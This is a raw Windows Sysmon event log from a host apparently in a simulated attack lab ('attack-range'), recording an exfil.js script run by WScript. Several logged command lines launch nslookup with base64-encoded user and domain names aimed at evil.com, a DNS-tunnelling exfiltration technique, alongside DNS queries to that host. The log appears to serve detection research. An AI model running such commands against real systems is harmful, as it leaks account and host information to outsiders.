14:16:21.675{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.675{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.675{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-503F-000000005F02}1216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.675{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.659{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.659{2E1864BB-17A1-629A-783D-000000005F02}55522384C:\Windows\System32\WScript.exe{2E1864BB-17B5-629A-503F-000000005F02}1216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.666{2E1864BB-17B5-629A-503F-000000005F02}1216C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlarrlfw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 22542200x8000000000000000197658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.426{00000000-0000-0000-0000-000000000000}5216evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.340{00000000-0000-0000-0000-000000000000}2792evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.242{00000000-0000-0000-0000-000000000000}7452evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.177{00000000-0000-0000-0000-000000000000}7672evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.069{00000000-0000-0000-0000-000000000000}8008evil.com0::ffff:127.0.0.1;<unknown process> 23542300x8000000000000000197653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.659{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllwqhy.tmpMD5=9C101754059B3D04F26CF3E2F51B88AA,SHA256=CC24D14F511AA03DA88D98786AE6BD9247656E6D05B1882F17E6E6D57E27DA80,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000197652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.996{00000000-0000-0000-0000-000000000000}1096evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.906{00000000-0000-0000-0000-000000000000}5044evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.801{00000000-0000-0000-0000-000000000000}4052evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.704{00000000-0000-0000-0000-000000000000}6196evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.533{00000000-0000-0000-0000-000000000000}1496evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.412{00000000-0000-0000-0000-000000000000}7184evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.300{00000000-0000-0000-0000-000000000000}4336evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.196{00000000-0000-0000-0000-000000000000}7428evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000197644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.590{2E1864BB-17B5-629A-4E3F-000000005F02}37764904C:\Windows\system32\conhost.exe{2E1864BB-17B5-629A-4F3F-000000005F02}5580C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.575{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-4F3F-000000005F02}5580C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.575{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.575{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.575{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.575{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.575{2E1864BB-17B5-629A-4D3F-000000005F02}38484768C:\Windows\system32\cmd.exe{2E1864BB-17B5-629A-4F3F-000000005F02}5580C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.587{2E1864BB-17B5-629A-4F3F-000000005F02}5580C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B5-629A-4D3F-000000005F02}3848C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllwqhy.tmp 2>&1 10341000x8000000000000000197636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.544{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B5-629A-4E3F-000000005F02}3776C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.544{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B5-629A-4E3F-000000005F02}3776C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.528{2E1864BB-17B5-629A-4E3F-000000005F02}37764904C:\Windows\system32\conhost.exe{2E1864BB-17B5-629A-4D3F-000000005F02}3848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.528{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-4E3F-000000005F02}3776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.512{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-4D3F-000000005F02}3848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.512{2E1864BB-17A1-629A-783D-000000005F02}55524344C:\Windows\System32\WScript.exe{2E1864BB-17B5-629A-4D3F-000000005F02}3848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.512{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.512{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.512{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.512{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.516{2E1864BB-17B5-629A-4D3F-000000005F02}3848C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllwqhy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 